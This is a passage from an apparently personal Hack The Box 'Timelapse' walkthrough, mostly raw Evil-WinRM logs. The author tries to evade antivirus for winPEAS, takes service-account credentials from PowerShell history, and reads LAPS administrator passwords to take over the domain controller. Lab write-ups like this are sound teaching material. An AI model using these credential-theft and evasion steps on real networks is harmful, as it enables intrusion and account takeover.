d----- 9/15/2018 12:19 AM Saved Games
d-r--- 9/15/2018 12:19 AM Videos
*Evil-WinRM* PS C:\Users\legacyy> cd Desktop
*Evil-WinRM* PS C:\Users\legacyy\Desktop> ls
Directory: C:\Users\legacyy\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 9/14/2023 1:08 PM 34 user.txt
*Evil-WinRM* PS C:\Users\legacyy\Desktop> cat user.txt
b4d108259211b472c1f480aecdaf68d4
Privesc
We will try and load the powershell file we saw before in;
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ cd WindowsPowershell
┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell]
└─$ ls
v1.0
┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell]
└─$ cd v1.0
┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell/v1.0]
└─$ ls
Modules
┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell/v1.0]
└─$ cd Modules
┌──(kali㉿kali)-[~/…/timelapse/WindowsPowershell/v1.0/Modules]
└─$ ls
AdmPwd.PS
┌──(kali㉿kali)-[~/…/timelapse/WindowsPowershell/v1.0/Modules]
└─$ cd AdmPwd.PS
┌──(kali㉿kali)-[~/…/WindowsPowershell/v1.0/Modules/AdmPwd.PS]
└─$ ls
AdmPwd.PS.dll AdmPwd.PS.format.ps1xml AdmPwd.PS.psd1 AdmPwd.Utils.dll en-US
┌──(kali㉿kali)-[~/…/WindowsPowershell/v1.0/Modules/AdmPwd.PS]
└─$
we upload the directory to windows machine
privatekey.pem
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents> upload /home/kali/HTB/timelapse/AdmPwd.PS
Info: Uploading /home/kali/HTB/timelapse/AdmPwd.PS to C:\Users\legacyy\Documents\AdmPwd.PS
Data: 42372 bytes of 42372 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\legacyy\Documents> ls
Directory: C:\Users\legacyy\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/14/2023 4:03 PM AdmPwd.PS
c*Evil-WinRM* PS C:\Users\legacyy\Documents> cd AdmPwd.PS
Cannot find path 'C:\Users\legacyy\Documents\AAdmPwd.PS' because it does not exist.
At line:1 char:1
+ cd AAdmPwd.PS
+ ~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\legacyy\Documents\AAdmPwd.PS:String) [Set-Location], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.SetLocationCommand
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd AdmPwd.PS
output
└─$ evil-winrm -S -i 10.10.11.152 -u legaccy -c /home/kali/HTB/timelapse/certificate.crt -k /home/kali/HTB/timelapse/privatekey.pem
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents> ls
Directory: C:\Users\legacyy\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/14/2023 4:03 PM AdmPwd.PS
*Evil-WinRM* PS C:\Users\legacyy\Documents> Import-Module C:\Users\legacyy\Documents\AdmPwd.PS\AdmPwd.PS.psd1
*Evil-WinRM* PS C:\Users\legacyy\Documents>
*Evil-WinRM* PS C:\Users\legacyy\Documents> Get-Content AdmPwd.PS.psd1
Cannot find path 'C:\Users\legacyy\Documents\AdmPwd.PS.psd1' because it does not exist.
At line:1 char:1
+ Get-Content AdmPwd.PS.psd1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\legacy...\AdmPwd.PS.psd1:String) [Get-Content], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\legacyy\Documents> [Reflection.Assembly]::LoadFile("C:\Users\legacyy\Documents\AdmPwd.PS\AdmPwd.PS.dll")
Enter PEM pass phrase:
Enter PEM pass phrase:
GAC Version Location
--- ------- --------
False v4.0.30319 C:\Users\legacyy\Documents\AdmPwd.PS\AdmPwd.PS.dll
*Evil-WinRM* PS C:\Users\legacyy\Documents> [Reflection.Assembly]::LoadFile("C:\Users\legacyy\Documents\AdmPwd.PS\AdmPwd.Utils.dll")
Enter PEM pass phrase:
GAC Version Location
--- ------- --------
False v4.0.30319 C:\Users\legacyy\Documents\AdmPwd.PS\AdmPwd.Utils.dll
*Evil-WinRM* PS C:\Users\legacyy\Documents> Import-Module C:\Users\legacyy\Documents\AdmPwd.PS\AdmPwd.PS.psd1
*Evil-WinRM* PS C:\Users\legacyy\Documents> Get-Content AdmPwd.PS.psd1
Enter PEM pass phrase:
Cannot find path 'C:\Users\legacyy\Documents\AdmPwd.PS.psd1' because it does not exist.
At line:1 char:1
+ Get-Content AdmPwd.PS.psd1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\legacy...\AdmPwd.PS.psd1:String) [Get-Content], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\legacyy\Documents> Get-Content C:\Users\legacyy\Documents\AdmPwd.PS\AdmPwd.PS.psd1
Enter PEM pass phrase:
#
# Module manifest for module 'AdmPwd.PS'
#
# Generated by: Jiri Formacek - MSFT
#
# Generated on: 3.12.2012
#
@{
# Script module or binary module file associated with this manifest
ModuleToProcess = '.\AdmPwd.PS.dll'
# Version number of this module.
ModuleVersion = '5.0.0.0'
# ID used to uniquely identify this module
GUID = '11869C0C-4440-4560-AA89-9EEF0C0224FA'
# Author of this module
Author = 'Jiri Formacek - MSFT'
# Company or vendor of this module
CompanyName = 'Microsoft | Services'
# Copyright statement for this module
Copyright = ''
# Description of the functionality provided by this module
Description = 'Provides cmdlets for configuration and usage of Local admin password management solution'
# Minimum version of the Windows PowerShell engine required by this module
PowerShellVersion = ''
# Name of the Windows PowerShell host required by this module
PowerShellHostName = ''
# Minimum version of the Windows PowerShell host required by this module
PowerShellHostVersion = ''
# Minimum version of the .NET Framework required by this module
DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module
CLRVersion = ''
# Processor architecture (None, X86, Amd64, IA64) required by this module
ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @()
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = @()
# Script files (.ps1) that are run in the caller's environment prior to importing this module
ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
FormatsToProcess = @('AdmPwd.PS.format.ps1xml')
# Modules to import as nested modules of the module specified in ModuleToProcess
NestedModules = @()
# Functions to export from this module
FunctionsToExport = ''
# Cmdlets to export from this module
CmdletsToExport = '*'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module
AliasesToExport = '*'
# List of all modules packaged with this module
ModuleList = @()
# List of all files packaged with this module
FileList = @('AdmPwd.PS.dll','AdmPwd.Utils.dll','AdmPwd.PS.format.ps1xml')
# Private data to pass to the module specified in ModuleToProcess
PrivateData = ''
}
To get the available command as suggested by chatGPT — Get-Command -Module ‘AdmPwd.PS’
*Evil-WinRM* PS C:\Users\legacyy\Documents\AdmPwd.PS> Get-Command -Module 'AdmPwd.PS'
Enter PEM pass phrase:
CommandType Name Version Source
----------- ---- ------- ------
Cmdlet Find-AdmPwdExtendedRights 5.0.0.0 AdmPwd.PS
Cmdlet Get-AdmPwdPassword 5.0.0.0 AdmPwd.PS
Cmdlet Reset-AdmPwdPassword 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdAuditing 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdComputerSelfPermission 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdReadPasswordPermission 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdResetPasswordPermission 5.0.0.0 AdmPwd.PS
Cmdlet Update-AdmPwdADSchema 5.0.0.0 AdmPwd.PS
i will try and get the adminpassword — Get-AdmPwdPassword
but nothing happened
Get-AdmPwdPassword -ComputerName DC01
Enter PEM pass phrase:
CommandType Name Version Source
----------- ---- ------- ------
Cmdlet Find-AdmPwdExtendedRights 5.0.0.0 AdmPwd.PS
Cmdlet Get-AdmPwdPassword 5.0.0.0 AdmPwd.PS
Cmdlet Reset-AdmPwdPassword 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdAuditing 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdComputerSelfPermission 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdReadPasswordPermission 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdResetPasswordPermission 5.0.0.0 AdmPwd.PS
Cmdlet Update-AdmPwdADSchema 5.0.0.0 AdmPwd.PS
*Evil-WinRM* PS C:\Users\legacyy\Documents> Get-AdmPwdPassword -ComputerName DC01
Enter PEM pass phrase:
Enter PEM pass phrase:
ComputerName DistinguishedName Password ExpirationTimestamp
------------ ----------------- -------- -------------------
DC01 CN=DC01,OU=Domain Controllers,DC=timelapse... 9/19/2023 1:08:21 PM
*Evil-WinRM* PS C:\Users\legacyy\Documents>
No luck with this uproach
i will try and run winpeas
I upload and run it on the machine
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ evil-winrm -S -i 10.10.11.152 -u legaccy -c /home/kali/HTB/timelapse/certificate.crt -k /home/kali/HTB/timelapse/
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplement
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents> upload /home/kali/HTB/timelapse/winPEASx64.exe`
Info: Uploading /home/kali/HTB/timelapse/winPEASx64.exe to C:\Users\legacyy\Documents\winPEASx64.exe
Enter PEM pass phrase:
Data: 3183956 bytes of 3183956 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\legacyy\Documents>
running winPEAS and looks like its detected as a virus and gets deleted so i upload it again
*Evil-WinRM* PS C:\Users\legacyy\Documents> ./winPEASx64.exe
Enter PEM pass phrase:
Program 'winPEASx64.exe' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted softwareAt line:1 char:1
+ ./winPEASx64.exe
+ ~~~~~~~~~~~~~~~~.
At line:1 char:1
+ ./winPEASx64.exe
+ ~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
*Evil-WinRM* PS C:\Users\legacyy\Documents> Set-ExecutionPolicy Bypass -Scope Process -Force
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents> ./winPEASx64.exe
Enter PEM pass phrase:
The term './winPEASx64.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ ./winPEASx64.exe
+ ~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (./winPEASx64.exe:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\legacyy\Documents> Get-ChildItem -Path . -Filter winPEASx64.exe
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents> ls
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents> ls
*Evil-WinRM* PS C:\Users\legacyy\Documents> upload winPEASx64.exe
uploaded winoPEAS EXE and the powershell Invoke-winPEAS.ps1
┌──(kali㉿kali)-[~/Downloads/x64]
└─$ locate winPEAS
/home/kali/Downloads/winPEASx64.exe
/home/kali/Downloads/winPEASx86.exe
/home/kali/HTB/Sauna/winPEASx64.exe
/home/kali/HTB/timelapse/winPEASx64.exe
/usr/share/powershell-empire/empire/server/data/module_source/privesc/Invoke-winPEAS.ps1
/usr/share/powershell-empire/empire/server/modules/powershell/privesc/winPEAS.yaml
┌──(kali㉿kali)-[~/Downloads/x64]
└─$ cd /usr/share/powershell-empire/empire/server/data/module_source/privesc/
┌──(kali㉿kali)-[/usr/…/server/data/module_source/privesc]
└─$ cpInvoke-winPEAS.ps1 ~/HTB/timelapse
cpInvoke-winPEAS.ps1: command not found
┌──(kali㉿kali)-[/usr/…/server/data/module_source/privesc]
└─$ cp Invoke-winPEAS.ps1 ~/HTB/timelapse
┌──(kali㉿kali)-[/usr/…/server/data/module_source/privesc]
└─$
Will run the following steps
Set-ExecutionPolicy Bypass -Scope Process -Force
. .\Invoke-winPEAS.ps1
Invoke-winPEAS
getting blocked by antivirus again
*Evil-WinRM* PS C:\Users\legacyy\Documents> Set-ExecutionPolicy Bypass -Scope Process -Force
*Evil-WinRM* PS C:\Users\legacyy\Documents> . .\Invoke-winPEAS.ps1
At C:\Users\legacyy\Documents\Invoke-winPEAS.ps1:1 char:1
+ function Invoke-winPEAS
+ ~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At C:\Users\legacyy\Documents\Invoke-winPEAS.ps1:1 char:1
+ function Invoke-winPEAS
+ ~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ParserError: (:) [], ParseException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
*Evil-WinRM* PS C:\Users\legacyy\Documents> ls
Directory: C:\Users\legacyy\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/15/2023 4:56 AM 941879 Invoke-winPEAS.ps1
-a---- 9/15/2023 4:51 AM 2367796 winPEASx64.exe
*Evil-WinRM* PS C:\Users\legacyy\Documents> Invoke-winPEAS
The term 'Invoke-winPEAS' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ Invoke-winPEAS
+ ~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (Invoke-winPEAS:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\legacyy\Documents>
aftert researhc, creat bat file with contents. Then we upload and run it on the computer where we have the winpeas
└─$ cat runWinPEAS.bat
@echo off
powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File "C:\Users\legacyy\Documents\Invoke-winPEAS.ps1"
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$
this fails again after detection as virus
*Evil-WinRM* PS C:\Users\legacyy\Documents> ;s
The term 's' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:2
+ ;s
+ ~
+ CategoryInfo : ObjectNotFound: (s:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\legacyy\Documents> ls
Directory: C:\Users\legacyy\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/15/2023 4:56 AM 941879 Invoke-winPEAS.ps1
-a---- 9/15/2023 5:03 AM 134 runWinPEAS.bat
-a---- 9/15/2023 4:51 AM 2367796 winPEASx64.exe
*Evil-WinRM* PS C:\Users\legacyy\Documents> ./runWinPEAS.bat
runWinPEAS.bat : At C:\Users\legacyy\Documents\Invoke-winPEAS.ps1:1 char:1
+ CategoryInfo : NotSpecified: (At C:\Users\leg...AS.ps1:1 char:1:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
+ function Invoke-winPEAS+ ~~~~~~~~~~~~~~~~~~~~~~~This script contains malicious content and has been blocked by your antivirus software. + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException + FullyQualifiedErrorId : ScriptContainedMaliciousContent *Evil-WinRM* PS C:\Users\legacyy\Documents>
downoloaded winPEAS.bat from – https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASbat
uploaded it and tried to run it
it ran and crashed but after giving us this output
*Evil-WinRM* PS C:\Users\legacyy\Documents> ./winPEAS.bat
winPEAS.bat : The system cannot find the batch label specified - SetOnce
+ CategoryInfo : NotSpecified: (The system cann...ified - SetOnce:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
The system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLinePowerShell v2 Version:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine
PowerShellVersion REG_SZ 2.0
PowerShell v5 Version:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine
PowerShellVersion REG_SZ 5.1.17763.1
Transcriptions Settings:
Module logging settings:
Scriptblog logging settings:
PS default transcript history
Checking PS history file
Volume in drive C has no label.
Volume Serial Number is 22CC-AE66
Directory of C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
03/04/2022 12:46 AM 434 ConsoleHost_history.txt
1 File(s) 434 bytes
0 Dir(s) 6,800,072,704 bytes free
The system cannot find the batch label specified - T_Progress****** B A T C H R E C U R S I O N exceeds STACK limits ******Recursion Count=344, Stack Usage=90 percent****** B A T C H PROCESSING IS A B O R T E D
Intersted in looking at ConsoleHost_history.txt which is inside C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine. We get it and download the file
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> ls
Directory: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/3/2022 11:46 PM 434 ConsoleHost_history.txt
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> download ConsoleHost_history.txt
Info: Downloading C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt to ConsoleHost_history.txt
Info: Download successful!
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine>
we check on this file
└─$ cat ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$
Usernam svc_deploy and password E3R$Q62^12p7PLlC%KWaxuaV. I tried normal evil-wrm but no luck then tried with -S and got it
└─$ evil-winrm -S -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>
Going to try and upload the files i tried before with the other user
Import-Module C:\Users\svc_deploy\Documents\AdmPwd.PS\AdmPwd.PS.psd1
*Evil-WinRM* PS C:\Users\svc_deploy\Documents\AdmPwd.PS> Get-Command -Module 'AdmPwd.PS'
CommandType Name Version Source
----------- ---- ------- ------
Cmdlet Find-AdmPwdExtendedRights 5.0.0.0 AdmPwd.PS
Cmdlet Get-AdmPwdPassword 5.0.0.0 AdmPwd.PS
Cmdlet Reset-AdmPwdPassword 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdAuditing 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdComputerSelfPermission 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdReadPasswordPermission 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdResetPasswordPermission 5.0.0.0 AdmPwd.PS
Cmdlet Update-AdmPwdADSchema 5.0.0.0 AdmPwd.PS
we run get Get-AdmPwdPassword
*Evil-WinRM* PS C:\Users\svc_deploy\Documents\AdmPwd.PS> Get-AdmPwdPassword -ComputerName DC01
ComputerName DistinguishedName Password ExpirationTimestamp
------------ ----------------- -------- -------------------
DC01 CN=DC01,OU=Domain Controllers,DC=timelapse... x6N4C+9O88}}#mN... 9/20/2023 3:40:41 AM
*Evil-WinRM* PS C:\Users\svc_deploy\Documents\AdmPwd.PS>
*Evil-WinRM* PS C:\Users\svc_deploy\Documents\AdmPwd.PS>
to get better view as this is truncated we use Format list – Get-AdmPwdPassword -ComputerName DC01 | Format-List
*Evil-WinRM* PS C:\Users\svc_deploy\Documents\AdmPwd.PS> Get-AdmPwdPassword -ComputerName DC01 | Format-List
ComputerName : DC01
DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
Password : x6N4C+9O88}}#mN4Tirl43/o
ExpirationTimestamp : 9/20/2023 3:40:41 AM
will try and log in with this credentials – evil-winrm -S -i 10.10.11.152 -u administrator -p ‘x6N4C+9O88}}#mN4Tirl43/o’. remebering to use the -S switch. Tried without and it didnt work and with and ity worked and we got root but i cant find the root.txt file
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ evil-winrm -S -i 10.10.11.152 -u administrator -p 'x6N4C+9O88}}#mN4Tirl43/o'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../
*Evil-WinRM* PS C:\Users\Administrator> ls
Directory: C:\Users\Administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 10/23/2021 11:27 AM 3D Objects
d-r--- 10/23/2021 11:27 AM Contacts
d-r--- 3/3/2022 7:48 PM Desktop
d-r--- 10/23/2021 12:22 PM Documents
d-r--- 10/25/2021 2:06 PM Downloads
d-r--- 10/23/2021 11:27 AM Favorites
d-r--- 10/23/2021 11:28 AM Links
d-r--- 10/23/2021 11:27 AM Music
d-r--- 10/23/2021 11:27 AM Pictures
d-r--- 10/23/2021 11:27 AM Saved Games
d-r--- 10/23/2021 11:27 AM Searches
d-r--- 10/23/2021 11:27 AM Videos
c*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls -Recurse | ? { $_.Name -eq 'root.txt' }
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
i will restart the machine and try again. after rebooting i cannot connect again.
will try an dget password again as it may have changed
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ evil-winrm -S -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> upload AdmPwd.PS
Info: Uploading /home/kali/HTB/timelapse/AdmPwd.PS to C:\Users\svc_deploy\Documents\AdmPwd.PS
Data: 42372 bytes of 42372 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Import-Module C:\Users\svc_deploy\Documents\AdmPwd.PS\AdmPwd.PS.psd1
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-Command -Module 'AdmPwd.PS'
CommandType Name Version Source
----------- ---- ------- ------
Cmdlet Find-AdmPwdExtendedRights 5.0.0.0 AdmPwd.PS
Cmdlet Get-AdmPwdPassword 5.0.0.0 AdmPwd.PS
Cmdlet Reset-AdmPwdPassword 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdAuditing 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdComputerSelfPermission 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdReadPasswordPermission 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdResetPasswordPermission 5.0.0.0 AdmPwd.PS
Cmdlet Update-AdmPwdADSchema 5.0.0.0 AdmPwd.PS
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-Command -Module 'AdmPwd.PS'
CommandType Name Version Source
----------- ---- ------- ------
Cmdlet Find-AdmPwdExtendedRights 5.0.0.0 AdmPwd.PS
Cmdlet Get-AdmPwdPassword 5.0.0.0 AdmPwd.PS
Cmdlet Reset-AdmPwdPassword 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdAuditing 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdComputerSelfPermission 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdReadPasswordPermission 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdResetPasswordPermission 5.0.0.0 AdmPwd.PS
Cmdlet Update-AdmPwdADSchema 5.0.0.0 AdmPwd.PS
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-AdmPwdPassword -ComputerName DC01 | Format-List
ComputerName : DC01
DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
Password : I5wQ0fGrS}M;}xe+6KtQ5b3]
ExpirationTimestamp : 9/20/2023 6:06:08 AM
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>
New password – I5wQ0fGrS}M;}xe+6KtQ5b3]
We connect again but cannot find flag again
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ evil-winrm -S -i 10.10.11.152 -u administrator -p 'I5wQ0fGrS}M;}xe+6KtQ5b3]'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cd ../
*Evil-WinRM* PS C:\Users\Administrator> ls
Directory: C:\Users\Administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 10/23/2021 11:27 AM 3D Objects
d-r--- 10/23/2021 11:27 AM Contacts
d-r--- 3/3/2022 7:48 PM Desktop
d-r--- 10/23/2021 12:22 PM Documents
d-r--- 10/25/2021 2:06 PM Downloads
d-r--- 10/23/2021 11:27 AM Favorites
d-r--- 10/23/2021 11:28 AM Links
d-r--- 10/23/2021 11:27 AM Music
d-r--- 10/23/2021 11:27 AM Pictures
d-r--- 10/23/2021 11:27 AM Saved Games
d-r--- 10/23/2021 11:27 AM Searches
d-r--- 10/23/2021 11:27 AM Videos
*Evil-WinRM* PS C:\Users\Administrator> ls -Recurse | ? { $_.Name -eq 'root.txt' }
*Evil-WinRM* PS C:\Users\Administrator>
Recursively search for the file from c:/ — C:> ls -Recurse | ? { $_.Name -eq ‘root.txt’ }
*Evil-WinRM* PS C:\Users\Administrator>
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cd ../
*Evil-WinRM* PS C:\Users\Administrator> cd ../
*Evil-WinRM* PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/23/2021 11:27 AM Administrator
d----- 10/25/2021 8:22 AM legacyy
d-r--- 10/23/2021 11:27 AM Public
d----- 10/25/2021 12:23 PM svc_deploy
d----- 2/23/2022 5:45 PM TRX
*Evil-WinRM* PS C:\Users> cd ../
*Evil-WinRM* PS C:\> ls -Recurse | ? { $_.Name -eq 'root.txt' }
Directory: C:\Users\TRX\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 9/15/2023 6:06 AM 34 root.txt
^C
Warning: Press "y" to exit, press any other key to continue
*Evil-WinRM* PS C:\> cd C:\Users\TRX\Desktop
*Evil-WinRM* PS C:\Users\TRX\Desktop> cat root.txt
51133447a29f21056ee6ded62a00f9d5
*Evil-WinRM* PS C:\Users\TRX\Desktop>
We get the flag – 51133447a29f21056ee6ded62a00f9d5